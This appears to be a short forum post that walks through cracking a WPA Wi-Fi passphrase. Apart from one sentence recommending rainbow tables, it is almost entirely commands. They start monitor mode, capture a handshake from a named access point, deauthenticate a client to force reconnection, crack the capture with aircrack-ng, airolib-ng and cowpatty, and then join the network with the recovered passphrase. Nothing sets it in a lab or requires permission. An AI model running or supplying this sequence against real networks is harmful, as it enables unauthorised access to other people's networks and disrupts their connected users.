There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size.
Code:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap
cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt
genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash
wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1
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